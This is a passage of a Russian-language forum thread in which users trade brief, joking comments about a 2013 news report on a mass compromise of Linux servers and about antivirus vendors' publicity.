Сообщение от Andrey Mitrofanov on 25-Фев-13, 09:43 
> Тем временем дрвеб решил попиариться

А Евгений Валентиновий упустил возможность?

Ответить | Правка | ^ к родителю #715 | Наверх | Cообщить модератору

730. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от greenman (ok) on 25-Фев-13, 12:53 
Да пиар-то очень сомнительный. Статейка очень слабая, если сравнить с Операцией 'Red October' и разборами Flame.
Ответить | Правка | ^ к родителю #728 | Наверх | Cообщить модератору

733. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от manefesto email(??) on 14-Мрт-13, 17:56 
+1 у меня сломали сервак =(
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

734. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от arisu (ok) on 14-Мрт-13, 18:00 
> +1 у меня сломали сервак =(

что, вынули из стойки и уронили? бывает.

Ответить | Правка | ^ к родителю #733 | Наверх | Cообщить модератору

735. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от AlexAT (ok) on 14-Мрт-13, 18:04 
> +1 у меня сломали сервак =(

-1

Ответить | Правка | ^ к родителю #733 | Наверх | Cообщить модератору

736. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Michael Shigorin email(ok) on 14-Мрт-13, 18:25 
> +1 у меня сломали сервак =(

А у меня -- нет...

Ответить | Правка | ^ к родителю #733 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру